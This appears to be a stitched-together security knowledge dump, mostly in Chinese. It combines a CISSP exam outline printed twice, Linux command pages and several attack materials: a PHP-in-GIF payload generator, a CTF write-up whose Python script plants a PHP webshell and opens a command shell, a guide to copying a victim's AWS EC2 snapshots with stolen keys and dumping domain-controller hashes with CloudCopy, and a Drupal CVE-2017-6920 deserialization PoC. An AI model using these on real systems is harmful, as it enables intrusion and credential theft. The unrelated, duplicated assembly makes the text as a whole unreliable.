1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP Certification Exam Outline 5 领域 1: 安全与风险管理 1.1 理解和运用保密性、完整性和可用性的概念 1.2 评估和应用安全治理的原理 1.3 确定合规要求 » 合约、法律、行业标准和监管的要求 » 隐私的要求 1.4 理解与信息安全的全球背景相关的法律和监管问题 1.5 理解、遵从与提升职业道德 » (ISC)2 职业道德规范 » 组织的道德规范 1.6 开发、撰写与实现安全政策、标准、流程和指南 1.7 对业务连续性(Business Continuity)进行识别、分析及优先级排序 » 制定并记录范围和计划 » 经营影响分析 (BIA) » 将安全功能与商业策咯、目标、使命和宗旨相连接 » 组织的流程 (例如购置、剥离、治理委员会) » 组织的角色与职责 » 安全控制框架 » 谨慎考虑/恪尽职守 » 网络犯罪和数据泄露 » 许可和知识产权的要求 » 进口/出口控制 » 跨境数据流 » 隐私 CISSP Certification Exam Outline 6 1.8 促进与实行人员安全的策略与流程 1.9 理解与运用风险管理的概念 1.10 理解与运用威胁建模的概念和方法论 1.11 将基于风险的管理概念运用到供应链 1.12 建立与维护安全意识、教育和培训计划 » 员工筛选与雇佣 » 雇佣合约与政策 » 入职与离职程序 » 供应商、顾问与承包商的合约与控制 » 合规策略要求 » 隐私策略要求 » 识别威胁与漏洞 » 风险评估/分析 » 风险响应 » 对策选择与实现 » 控制措施适用的类型(例如:预防措施、检测措施和 纠正措施 » 安全控制评估 (SCA) » 监控与测量 » 资产估价 » 汇报 » 持续提高 » 风险框架 » 威胁建模的方法论 » » 威胁建模的概念 » 与硬件、软件和服务相关的风险 » » 第三方评估与监测 » » 最低安全需求 » 服务水平要求 » 安全意识宣贯与培训的方法和技术 » »定期内容审查 » »方案效果评价 CISSP Certification Exam Outline 7 领域 2: 资产安全 2.1 识别与分类信息和资产 2.2 确定与维护信息和资产所有权 2.3 保护隐私 2.4 确保适当的资产保留 2.5 确定数据安全控制 2.6 建立信息和资产的处理要求 » 数据所有者 » 数据所有者 » 数据残留 » 数据收集限制 » 理解数据状态 » 定界与定制 » 标准选择 » 数据保护的方法 » 数据分级 » 资产分级 CISSP Certification Exam Outline 8 领域 3: 安全架构与工程 3.1 使用安全设计原理来实施与管理工程的进程 3.2 理解安全模型的基本概念 3.3 基于系统安全需求选择控制措施 3.4 理解信息系统的安全功能(例如:内存保护、可信平台模块(TPM)、加密/解密) 3.5 评估与缓解安全架构、设计和解决方案要素的漏洞 3.6 评估和缓解Web系统中的漏洞 3.7 评估与缓解移动系统的漏洞 3.8 评估与缓解嵌入式设备的漏洞 3.9 运用密码学 3.10 将安全原理运用到场所与设施的设计上 » 基于客户端的系统 » 基于服务端的系统 » 数据库系统 » 密码系统 » 工业控制系统(ICS) » 基于云端的系统 » 分布式系统 » 物联网(IoT) » 密码生命周期 (例如:密钥管理、算法选择) » 加密方法(例如:对称、非对称、椭圆曲线) » 公钥基础设施 (PKI) » 密钥管理实践 » 数字签名 » 抗抵赖性 » 完整性 (例如:哈希函数) » 理解密码攻击方法 » 数字版权管理(DRM) CISSP Certification Exam Outline 9 3.11 实施场所与设施的安全控制 » 配线柜/中继配线设施 » 服务器机房/数据中心 » 媒体储存设施 » 证据储存 » 限制区与工作区的安全 CISSP Certification Exam Outline 10 领域 4: 通信与网络安全 4.1 在网络架构中实施安全设计原则 4.2 网络组件安全 4.3 根据设计实施安全通信通道 » 开放系统互连(OSI)和传输控制协议 / 互联网协 议(TCP/IP)模型 » 互联网协议(TCP/IP)网络 » 多层协议的作用 » 聚合协议 » 软件定义网络 » 无线网络 » 硬件操作 » 传输介质 » 网络访问控制(NAC)设备 » 端点安全 » 内容配送网 » 语音 » 多媒体协作 » 远程访问 » 数据通信 » 虚拟化网络 CISSP Certification Exam Outline 11 领域 5: 身份与访问管理 (IAM) 5.1 控制对资产的物理和逻辑访问 » 信息 » 系统 » 设备 » 设施 5.2 管理对人员、设备和服务的身份识别与验证 5.3 集成身份为第三方服务 5.4 实施和管理授权机制 5.5 管理身份和访问配置生命周期 » 用户访问审查 » 系统账户访问审查 » 配置与清除配置 » 实施身份管理 » 单/多因素身份验证 » 可核查性 » 会话管理 » 身份注册与证明 » 联合身份管理 (FIM) » 凭证管理系统 » 内部部署 » 云计算 » 联合 » 基于角色的访问控制 (RBAC) » 基于规则的访问控制 » 强制访问控制 (MAC) » 自主访问控制 (DAC) » 基于属性的访问控制 (ABAC) CISSP Certification Exam Outline 1212 6.1 设计和验证评估、测试和审计策略 6.2 对安全控制进行测试 6.3 收集安全流程数据 (如:技术和管理) 6.4 分析测试输出并生成报告 6.5 执行或协助安全审计 » 漏洞评估 » 渗透测试 » 日志审查 » 模拟交易 » 代码审查和测试 » 误用案例测试 » 测试覆盖率分析 » 接口测试 » 内部 » 外部 » 第三方 » 内部 » 外部 » 第三方 » 账户管理 » 管理层审查和批准 » 关键业绩和风险指标 » 备份验证数据 » 信息安全意识宣贯 » 灾难恢复 (DR) 和业务连续性 (BC) 领域 6: 安全评估与测试 CISSP Certification Exam Outline 13 7.1 理解和支持调查 7.2 了解调查类型的要求 7.3 进行日志记录和持续监测活动 7.4 安全配置资源 7.5 理解和应用基本的安全运营概念 7.6 应用资源保护技术 » 介质管理 » 硬件和软件资产管理 领域 7: 安全运营 » 证据采集和处理 » 报告和记录 » 调查技术 » 数字取证工具、策略和程序 » 入侵检测和防御 » 安全信息和事件管理 (SIEM) » 不间断持续监测 » 输出流量持续监测 » 资产清单 » 资产管理 » 配置管理 » 因需可知 / 最低权限 » 职责分离 » 特权帐户管理 » 岗位轮换 » 信息生命周期 » 服务水平协议(SLA) » 行政 » 刑事 » 民事 » 监管 » 行业标准 CISSP Certification Exam Outline 14 7.7 执行事件管理 7.8 检测和预防措施的运营及维护 7.9 实施和支持补丁和漏洞管理 7.10 理解并参与变更管理流程 7.11 实施灾难恢复(DR)过程 7.12 实施灾难恢复 (DR) 流程 7.13 测试灾难恢复计划 (DRP) 7.14 参与业务连续性 (BC) 计划制定和演练 7.15 实施和管理物理安全 7.16 解决人员安全问题 » 检测 » 响应 » 缓解 » 报告 » 恢复 » 补救 » 经验教训 » 防火墙 » 入侵检测和防御系统 » 白名单 / 黑名单 » 第三方提供的安全服务 » 沙箱 » 蜜罐 / 蜜网 » 反恶意软件 » 备份存储策略 » 恢复站点策略 » 多个处理站点 » 系统弹性、高可用性、服务质量 (QoS) 和容错 » 响应 » 人员 » 通信 » 评估 » 恢复 » 培训和信息安全意识宣贯 » 书面测试/测试 » 穿行测试 » 模拟测试 » 并行测试 » 全面中断测试 » 外围安全控制 » 内部安全控制 » 旅行 » 安全培训和意识 » 应急管理 » 胁迫 CISSP Certification Exam Outline 15 领域 8: 软件开发安全 8.1 理解安全并将其融入软件开发生命周期(SDLC)中 8.2 开发环境中识别和应用安全控制 8.3 评估软件安全的有效性 8.4 评估获得软件对安全的影响 8.5 定义并应用安全编码准则和标准 » 开发方法 » 成熟度模型 » 运营和维护 » 变更管理 » 集成产品团队 » 软件环境的安全 » 配置管理作为安全编码的一个方面 » 审核和变更记录 » 风险分析和缓解 » 源代码级安全弱点和漏洞 » 应用编程接口安全 » 安全编码实践 CISSP Certification Exam Outline 16 附加考试信息 补充参考 鼓励应试者通过回顾有关CBK的相关资源,并找出可能需要额外注意的研究领域来补充他们的教 育和经验。 在 www.isc2.org/certifications/References 网站中查看补充参考的完整书单 考试政策和规程 (ISC)² 建议 CISSP 考生在报名参加考试前到 www.isc2.org/Register-for-Exam 阅读有关考试政 策和规程重要信息的详尽细目。 法律信息 有关 (ISC)² 法律政策的任何问题, 请致信 legal@isc2.org 与 (ISC)² 法律部门联系。 其他问题? (ISC)² 考试服务 311 Park Place Blvd, Suite 400 Clearwater, FL 33759 (ISC)² 美洲区 Tel: +1.866.331.ISC2 (4722) Email: info@isc2.org (ISC)² 亚太区 Tel: +(852) 28506951 Email: isc2asia@isc2.org (ISC)² 欧洲、中东及非洲地区 Tel: +44 (0)203 300 1625 Email: info-emea@isc2.org v0118 16 考试大纲 注册信息系统安全师 生效期:2018年4月 CISSP Certification Exam Outline 2 关于CISSP 注册信息系统安全师(CISSP)是全球最受广泛认可的信息安全认证。CISSP认证反映了持证者具备有效设计、 构建及管理组织整体安全态势所需的深厚信息安全技术、管理知识、技能与经验。 CISSP的公共知识体系(CBK)中包含的广泛议题确保了与信息安全领域中所有原理的相关性。通过认证的考生 展示了在以下八大知识域的能力: • 安全与风险管理 • 资产安全 • 安全架构与工程 • 通信与网络安全 • 身份与访问管理 • 安全评估与测试 • 安全运营 • 软件开发安全 经验要求 考生必须在(ISC)2 CISSP公共知识体系(CBK)八大知识域中的至少两个或两个以上领域,拥有至少5年全职工作 经验。拥有4年大学本科学历或同等学历,以及(ISC)2认可的其它证书可以抵免一年的工作经验。所有教育学位 最多只能抵免一年工作经验。 没有满足CISSP所需工作经验的考生,如果能够通过CISSP考试则可以成为(ISC)2的准会员(Associate) 。(ISC)2 的准会员可以用接下来的6年时间积累所需工作经验。 认可 CISSP是业界首张符合ANSI/ ISO/IEC 17024 国际标准要求的信息安全认证。 工作任务分析(Job Task Analysis) (ISC)2对其会员有义务维护CISSP的关联性。定期进行工作任务分析(JTA)是一项系统而关键的过程,用来确定 由CISSP安全专业人士所从事的工作。JTA的分析结果会用来更新考试。这个过程确保了考生的测试题目与目前 从业的信息安全专业人士的角色和职责密切相关。 CISSP Certification Exam Outline 3 CISSP计算机自适应测试(CAT)的考试信息 CISSP CAT 考试的权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 3小时 100道至150道 多项选择和高级创新型考题 1000分中得到700分 英语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测试中心 领域 平均权重 1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP的所有英语考试都采用计算机自适应测试(CAT)。CISSP的其它语种的考试 采用线性和固定格式的测试。欲了解CISSP的CAT详情,请访问: www.isc2.org/ certificatons/CISSP-CAT。 CISSP Certification Exam Outline 4 CISSP线性考试信息 CISSP线性考试权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 6小时 250道 多项选择和高级创新型考题 1000分中得到700分 法语、德语、巴西葡萄牙语、西班牙语、日语、简体中文、 韩语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测 试中心 领域 权重 1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP Certification Exam Outline 5 领域 1: 安全与风险管理 1.1 理解和运用保密性、完整性和可用性的概念 1.2 评估和应用安全治理的原理 1.3 确定合规要求 » 合约、法律、行业标准和监管的要求 » 隐私的要求 1.4 理解与信息安全的全球背景相关的法律和监管问题 1.5 理解、遵从与提升职业道德 » (ISC)2 职业道德规范 » 组织的道德规范 1.6 开发、撰写与实现安全政策、标准、流程和指南 1.7 对业务连续性(Business Continuity)进行识别、分析及优先级排序 » 制定并记录范围和计划 » 经营影响分析 (BIA) » 将安全功能与商业策咯、目标、使命和宗旨相连接 » 组织的流程 (例如购置、剥离、治理委员会) » 组织的角色与职责 » 安全控制框架 » 谨慎考虑/恪尽职守 » 网络犯罪和数据泄露 » 许可和知识产权的要求 » 进口/出口控制 » 跨境数据流 » 隐私 CISSP Certification Exam Outline 6 1.8 促进与实行人员安全的策略与流程 1.9 理解与运用风险管理的概念 1.10 理解与运用威胁建模的概念和方法论 1.11 将基于风险的管理概念运用到供应链 1.12 建立与维护安全意识、教育和培训计划 » 员工筛选与雇佣 » 雇佣合约与政策 » 入职与离职程序 » 供应商、顾问与承包商的合约与控制 » 合规策略要求 » 隐私策略要求 » 识别威胁与漏洞 » 风险评估/分析 » 风险响应 » 对策选择与实现 » 控制措施适用的类型(例如:预防措施、检测措施和 纠正措施 » 安全控制评估 (SCA) » 监控与测量 » 资产估价 » 汇报 » 持续提高 » 风险框架 » 威胁建模的方法论 » » 威胁建模的概念 » 与硬件、软件和服务相关的风险 » » 第三方评估与监测 » » 最低安全需求 » 服务水平要求 » 安全意识宣贯与培训的方法和技术 » »定期内容审查 » »方案效果评价 CISSP Certification Exam Outline 7 领域 2: 资产安全 2.1 识别与分类信息和资产 2.2 确定与维护信息和资产所有权 2.3 保护隐私 2.4 确保适当的资产保留 2.5 确定数据安全控制 2.6 建立信息和资产的处理要求 » 数据所有者 » 数据所有者 » 数据残留 » 数据收集限制 » 理解数据状态 » 定界与定制 » 标准选择 » 数据保护的方法 » 数据分级 » 资产分级 CISSP Certification Exam Outline 8 领域 3: 安全架构与工程 3.1 使用安全设计原理来实施与管理工程的进程 3.2 理解安全模型的基本概念 3.3 基于系统安全需求选择控制措施 3.4 理解信息系统的安全功能(例如:内存保护、可信平台模块(TPM)、加密/解密) 3.5 评估与缓解安全架构、设计和解决方案要素的漏洞 3.6 评估和缓解Web系统中的漏洞 3.7 评估与缓解移动系统的漏洞 3.8 评估与缓解嵌入式设备的漏洞 3.9 运用密码学 3.10 将安全原理运用到场所与设施的设计上 » 基于客户端的系统 » 基于服务端的系统 » 数据库系统 » 密码系统 » 工业控制系统(ICS) » 基于云端的系统 » 分布式系统 » 物联网(IoT) » 密码生命周期 (例如:密钥管理、算法选择) » 加密方法(例如:对称、非对称、椭圆曲线) » 公钥基础设施 (PKI) » 密钥管理实践 » 数字签名 » 抗抵赖性 » 完整性 (例如:哈希函数) » 理解密码攻击方法 » 数字版权管理(DRM) CISSP Certification Exam Outline 9 3.11 实施场所与设施的安全控制 » 配线柜/中继配线设施 » 服务器机房/数据中心 » 媒体储存设施 » 证据储存 » 限制区与工作区的安全 CISSP Certification Exam Outline 10 领域 4: 通信与网络安全 4.1 在网络架构中实施安全设计原则 4.2 网络组件安全 4.3 根据设计实施安全通信通道 » 开放系统互连(OSI)和传输控制协议 / 互联网协 议(TCP/IP)模型 » 互联网协议(TCP/IP)网络 » 多层协议的作用 » 聚合协议 » 软件定义网络 » 无线网络 » 硬件操作 » 传输介质 » 网络访问控制(NAC)设备 » 端点安全 » 内容配送网 » 语音 » 多媒体协作 » 远程访问 » 数据通信 » 虚拟化网络 CISSP Certification Exam Outline 11 领域 5: 身份与访问管理 (IAM) 5.1 控制对资产的物理和逻辑访问 » 信息 » 系统 » 设备 » 设施 5.2 管理对人员、设备和服务的身份识别与验证 5.3 集成身份为第三方服务 5.4 实施和管理授权机制 5.5 管理身份和访问配置生命周期 » 用户访问审查 » 系统账户访问审查 » 配置与清除配置 » 实施身份管理 » 单/多因素身份验证 » 可核查性 » 会话管理 » 身份注册与证明 » 联合身份管理 (FIM) » 凭证管理系统 » 内部部署 » 云计算 » 联合 » 基于角色的访问控制 (RBAC) » 基于规则的访问控制 » 强制访问控制 (MAC) » 自主访问控制 (DAC) » 基于属性的访问控制 (ABAC) CISSP Certification Exam Outline 1212 6.1 设计和验证评估、测试和审计策略 6.2 对安全控制进行测试 6.3 收集安全流程数据 (如:技术和管理) 6.4 分析测试输出并生成报告 6.5 执行或协助安全审计 » 漏洞评估 » 渗透测试 » 日志审查 » 模拟交易 » 代码审查和测试 » 误用案例测试 » 测试覆盖率分析 » 接口测试 » 内部 » 外部 » 第三方 » 内部 » 外部 » 第三方 » 账户管理 » 管理层审查和批准 » 关键业绩和风险指标 » 备份验证数据 » 信息安全意识宣贯 » 灾难恢复 (DR) 和业务连续性 (BC) 领域 6: 安全评估与测试 CISSP Certification Exam Outline 13 7.1 理解和支持调查 7.2 了解调查类型的要求 7.3 进行日志记录和持续监测活动 7.4 安全配置资源 7.5 理解和应用基本的安全运营概念 7.6 应用资源保护技术 » 介质管理 » 硬件和软件资产管理 领域 7: 安全运营 » 证据采集和处理 » 报告和记录 » 调查技术 » 数字取证工具、策略和程序 » 入侵检测和防御 » 安全信息和事件管理 (SIEM) » 不间断持续监测 » 输出流量持续监测 » 资产清单 » 资产管理 » 配置管理 » 因需可知 / 最低权限 » 职责分离 » 特权帐户管理 » 岗位轮换 » 信息生命周期 » 服务水平协议(SLA) » 行政 » 刑事 » 民事 » 监管 » 行业标准 CISSP Certification Exam Outline 14 7.7 执行事件管理 7.8 检测和预防措施的运营及维护 7.9 实施和支持补丁和漏洞管理 7.10 理解并参与变更管理流程 7.11 实施灾难恢复(DR)过程 7.12 实施灾难恢复 (DR) 流程 7.13 测试灾难恢复计划 (DRP) 7.14 参与业务连续性 (BC) 计划制定和演练 7.15 实施和管理物理安全 7.16 解决人员安全问题 » 检测 » 响应 » 缓解 » 报告 » 恢复 » 补救 » 经验教训 » 防火墙 » 入侵检测和防御系统 » 白名单 / 黑名单 » 第三方提供的安全服务 » 沙箱 » 蜜罐 / 蜜网 » 反恶意软件 » 备份存储策略 » 恢复站点策略 » 多个处理站点 » 系统弹性、高可用性、服务质量 (QoS) 和容错 » 响应 » 人员 » 通信 » 评估 » 恢复 » 培训和信息安全意识宣贯 » 书面测试/测试 » 穿行测试 » 模拟测试 » 并行测试 » 全面中断测试 » 外围安全控制 » 内部安全控制 » 旅行 » 安全培训和意识 » 应急管理 » 胁迫 CISSP Certification Exam Outline 15 领域 8: 软件开发安全 8.1 理解安全并将其融入软件开发生命周期(SDLC)中 8.2 开发环境中识别和应用安全控制 8.3 评估软件安全的有效性 8.4 评估获得软件对安全的影响 8.5 定义并应用安全编码准则和标准 » 开发方法 » 成熟度模型 » 运营和维护 » 变更管理 » 集成产品团队 » 软件环境的安全 » 配置管理作为安全编码的一个方面 » 审核和变更记录 » 风险分析和缓解 » 源代码级安全弱点和漏洞 » 应用编程接口安全 » 安全编码实践 CISSP Certification Exam Outline 16 附加考试信息 补充参考 鼓励应试者通过回顾有关CBK的相关资源,并找出可能需要额外注意的研究领域来补充他们的教 育和经验。 在 www.isc2.org/certifications/References 网站中查看补充参考的完整书单 考试政策和规程 (ISC)² 建议 CISSP 考生在报名参加考试前到 www.isc2.org/Register-for-Exam 阅读有关考试政 策和规程重要信息的详尽细目。 法律信息 有关 (ISC)² 法律政策的任何问题, 请致信 legal@isc2.org 与 (ISC)² 法律部门联系。 其他问题? (ISC)² 考试服务 311 Park Place Blvd, Suite 400 Clearwater, FL 33759 (ISC)² 美洲区 Tel: +1.866.331.ISC2 (4722) Email: info@isc2.org (ISC)² 亚太区 Tel: +(852) 28506951 Email: isc2asia@isc2.org (ISC)² 欧洲、中东及非洲地区 Tel: +44 (0)203 300 1625 Email: info-emea@isc2.org v0118 16
sec-knowleage
# Deloitte CyberTech TLV 2020 - CyberTank Challenge Writeups for various challenges from the 2020 [Deloitte CyberTech TLV CTF](http://cybertechtlv.hackazon.org/). Finished 2nd. ![](images/ranking.png) ![](images/challenges.png)
sec-knowleage
watch === 可以将命令的输出结果输出到标准输出设备,多用于周期性执行命令/定时执行命令 ## 补充说明 **watch命令** 以周期性的方式执行给定的指令,指令输出以全屏方式显示。watch是一个非常实用的命令,基本所有的Linux发行版都带有这个小工具,如同名字一样,watch可以帮你监测一个命令的运行结果,省得你一遍遍的手动运行。 ### 语法 ```shell watch(选项)(参数) ``` ### 选项 ```shell -n # 或--interval watch缺省每2秒运行一下程序,可以用-n或-interval来指定间隔的时间。 -d # 或--differences 用-d或--differences 选项watch 会高亮显示变化的区域。 而-d=cumulative选项会把变动过的地方(不管最近的那次有没有变动)都高亮显示出来。 -t # 或-no-title 会关闭watch命令在顶部的时间间隔,命令,当前时间的输出。 -h, --help # 查看帮助文档 ``` ### 参数 指令:需要周期性执行的指令。 ### 实例 ```shell watch -n 1 -d netstat -ant       # 命令:每隔一秒高亮显示网络链接数的变化情况 watch -n 1 -d 'pstree|grep http' # 每隔一秒高亮显示http链接数的变化情况。 后面接的命令若带有管道符,需要加''将命令区域归整。 watch 'netstat -an | grep:21 | \ grep<模拟攻击客户机的IP>| wc -l' # 实时查看模拟攻击客户机建立起来的连接数 watch -d 'ls -l|grep scf' # 监测当前目录中 scf' 的文件的变化 watch -n 10 'cat /proc/loadavg' # 10秒一次输出系统的平均负载 watch uptime watch -t uptime watch -d -n 1 netstat -ntlp watch -d 'ls -l | fgrep goface' # 监测goface的文件 watch -t -differences=cumulative uptime watch -n 60 from # 监控mail watch -n 1 "df -i;df" # 监测磁盘inode和block数目变化情况 ``` FreeBSD和Linux下watch命令的不同,在Linux下,watch是周期性的执行下个程序,并全屏显示执行结果,如:`watch -n 1 -d netstat -ant`,而在FreeBSD下的watch命令是查看其它用户的正在运行的操作,watch允许你偷看其它terminal正在做什么,该命令只能让超级用户使用。
sec-knowleage
prtstat === 显示进程信息 ## 补充说明 **prtstat命令**打印指定进程的统计信息。这个信息来自/proc/PID/stat文件。 ## 语法 ```shell prtstat [-r|--raw] pid prtstat -V|--version ``` ## 例子 ```shell [root@localhost command]# ps -ef|grep nginx root 4022 250867 0 16:39 pts/1 00:00:00 grep --color=auto nginx root 224312 1 0 4月26 ? 00:00:00 nginx: master process /var/openresty/nginx/sbin/nginx nobody 224313 224312 0 4月26 ? 00:00:00 nginx: worker process [root@localhost command]# prtstat -r 224312 pid: 224312 comm: nginx state: S ppid: 1 pgrp: 224312 session: 224312 tty_nr: 0 tpgid: -1 flags: 402040 minflt: 110 cminflt: 0 majflt: 0 cmajflt: 0 utime: 0 stime: 0 cutime: 0 cstime: 0 priority: 20 nice: 0 num_threads: 1 itrealvalue: 0 starttime: 6271470 vsize: 56369152 rss: 413 rsslim: 18446744073709551615 startcode: 4194304 endcode: 5772276 startstack: 140722783765648 kstkesp: 7FFC9389BFB8 kstkeip: 7F25CD42F6C6 wchan: 18446744071885754297 nswap: 0 cnswap: 18446744071885754297 exit_signal: 17 processor: 2 rt_priority: 0 policy: 0 delayaccr_blkio_ticks: 0 guest_time: 0 cguest_time: 0 ``` ### 注意 1. `prtstat`命令来自于psmisc包。此包来自于base源仓库。 2. psmisc.x86_64 : 用于管理系统上进程的实用程序
sec-knowleage
<?php // createGIFwithGlobalColorTable.php $_file="example.gif"; $_payload="<?php evil();?>"; $_width=200; $_height=200; if(strlen($_payload)%3!=0){ echo "payload%3==0 !"; exit(); } $im = imagecreate($_width, $_height); $_hex=unpack('H*',$_payload); $colors_hex=str_split($_hex[1], 6); for($i=0; $i < count($colors_hex); $i++){ $_color_chunks=str_split($colors_hex[$i], 2); $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); imagesetpixel($im,$i,1,$color); } imagegif($im,$_file); ?>
sec-knowleage
# Pixeditor (Web) In the task we get access to a web-based picture editor. We can draw a small image by setting pixel colors and then save it on the server as JPG, PNG, BMP or GIF under given filename. There is a check for the file extension when saving the file, however the name is truncated to 50 characters after the extension check. So we can use name ending with `.png` to pass the check, but if the name is too long, this extension will be cut. Using this trick we can save a `.php` file by using name in format `'x'*46+'.php.png`. Now we would like to place some PHP code inside the file, but we can only draw some pixels. Fortunately PHP interpreters are permissive, and they will execute anything which looks like valid PHP code. So we can have some random bytes before and after PHP code in the file, and it will still work. We need to paint a picture where bytes will create code we want. The easiest option is to use BMP because pixels simply go into the file directly as BGR color values. Web editor includes also alpha channel, so we actually have 32x32x4 bytes, and we want to skip every 4th byte, because it won't appear in the output file. Also the bytes in BMP are inverted, because the web editor format is RGBA and BMP has BGR. The solution is to split the payload `<?php $_GET['a']($_GET['b']); ?>` into 3-bytes long chunks, and place then in consecutive picture pixels inverted: ```python import re import requests from crypto_commons.generic import chunk def shell(url): while True: b = raw_input("> ") print(requests.get(url + "?a=system&b=" + b).text[3030:]) def pad(plain): missing = 3 - len(plain) % 3 return plain + (" " * missing) def create_shell(main_url): data = [1 for _ in range(32 * 32 * 4)] index = 0 for c in chunk(pad("<?php $_GET['a']($_GET['b']); ?>"), 3): data[index + 2] = ord(c[0]) # R data[index + 1] = ord(c[1]) # G data[index] = ord(c[2]) # B index += 4 url = main_url + "save.php" name = "A" * 46 + ".php" r = requests.post(url, data={"data": str(data), "name": name + ".JPG", "format": "BMP"}) link = re.findall("<a href='(.*)'>Download", r.text)[0] return link def main(): main_url = "http://pixeditor.challs.malice.fr/" link = create_shell(main_url) print(main_url + link) shell(main_url + link) main() ``` With such shell we can just find the flag in `/` and cat it to get `NDH{Msp4int.3x3>all>th3g1mp}`
sec-knowleage
--- title: 获取共享快照内的数据 --- <center><h1>获取共享快照内的数据</h1></center> --- ## 前言 如果当前凭证具有 EC2:CreateSnapshot 权限的话,可以通过创建共享快照的方式,然后将自己 aws 控制台下的实例挂载由该快照生成的卷,从而获取到目标 EC2 中的内容。 ## 公有快照 这里以公有快照作为示例。 </br> <img width="1200" src="/img/1650001031.png"></br> 这里随便找一个快照,点击创建卷,卷的大小需要大于或等于快照大小,这里创建一个 20G 大小的卷,另外可用区需要和自己的 EC2 保持一致,最后快照 ID 指定刚才随便找的快照 </br> <img width="800" src="/img/1650001064.png"></br> 将刚创建的卷挂载到自己的实例中 </br> <img width="800" src="/img/1650001090.png"></br> 登录到自己的实例,查看刚才添加卷的名称 ```bash sudo fdisk -l ``` </br> <img width="600" src="/img/1650001092.png"></br> 通过大小可以判断出来 /dev/xvdf 是刚才刚才添加的卷,然后将这个卷挂载到实例中,通过 ls 就可以看到这个公有快照中的数据了。 ```bash sudo mkdir /test sudo mount /dev/xvdf3 /test sudo ls /test ``` </br> <img width="800" src="/img/1650001117.png"></br> ## 私有快照 在拿到目标 AWS 控制台权限时,如果无法登录到实例,可以为目标实例打个快照,然后将快照共享给自己。 </br> <img width="800" src="/img/1650001136.png"></br> 将自己的账 号 ID 添加到快照共享后,在自己的 AWS 快照控制台的私有快照处就能看到目标快照了,此时就可以将其挂载到自己的实例,查看里面的数据了。 </br> <img width="800" src="/img/1650001161.png"></br> 目前也已经有了自动化工具了,CloudCopy 可以通过提供的访问凭证自动实现创建实例快照、自动挂载快照等操作 不过 CloudCopy 默认只会获取实例中的域成员哈希值,也就是说前提目标实例是一个域控,不过将这个工具稍微加以修改,就可以获取到其他的文件了,下面来看下这个工具的使用。 获取 CloudCopy 工具 ```bash git clone https://github.com/Static-Flow/CloudCopy.git cd CloudCopy python3 CloudCopy.py ``` > 如果运行报错,一般是因为第三方库缺失,根据提示安装对应模块即可 接下来,开始进行相应的配置,输入自己的 AWS 账号 ID 及访问凭证以及目标的访问凭证 ```bash manual_cloudcopy show_options set attackeraccountid xxx set attackerAccessKey xxx set attackerSecretKey xxx set victimAccessKey xxx set victimSecretKey xxx set region ap-northeast-2 ``` </br> <img width="800" src="/img/1650001184.png"></br> 配置好之后,就可以利用 CloudCopy 进行哈希窃取了 ```bash stealDCHashes ``` 这时会提示选择实例,直接输入要窃取的实例编号即可 </br> <img width="800" src="/img/1650001208.png"></br> 等待一段时间,就可以看到已经读到 DC 的哈希了。 </br> <img width="1000" src="/img/1650001226.png"></br> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2022年4月15日" } } </script>
sec-knowleage
# Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920) * 影响软件:Drupal * 方式:反序列化 * 参考链接:[CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/) * 效果:任意代码执行 ## 漏洞环境 执行如下命令启动 drupal 8.3.0 的环境: ```bash docker compose up -d ``` 环境启动后,访问 `http://your-ip:8080/` 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。 ## 漏洞复现 * 先安装 `yaml` 扩展 ```bash # 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源 cat > sources.list << EOF deb http://mirrors.163.com/debian/ jessie main non-free contrib deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb-src http://mirrors.163.com/debian/ jessie main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib EOF # 安装依赖 apt update apt-get -y install gcc make autoconf libc-dev pkg-config apt-get -y install libyaml-dev # 安装yaml扩展 pecl install yaml docker-php-ext-enable yaml.so # 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini # 退出容器 exit # 重启容器,CONTAINER换成自己的容器ID docker restart CONTAINER ``` * 1.登录一个管理员账号 * 2.访问 `http://127.0.0.1:8080/admin/config/development/configuration/single/import` * 3.如下图所示,`Configuration type` 选择 `Simple configuration`,`Configuration name` 任意填写,`Paste your configuration here` 中填写PoC如下: ```php !php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}" ``` ![1](1.png) * 4.点击 `Import` 后可以看到漏洞触发成功,弹出 `phpinfo` 页面。 ![2](2.png) * Tips: * 虽然官方 CPE 信息显示从 `8.0.0` 开始就有该漏洞,但是在 `drupal:8.0.0` 容器内并没有复现成功,相同操作在 `drupal:8.3.0` 则可以复现成功,故基础镜像选择`drupal:8.3.0`
sec-knowleage
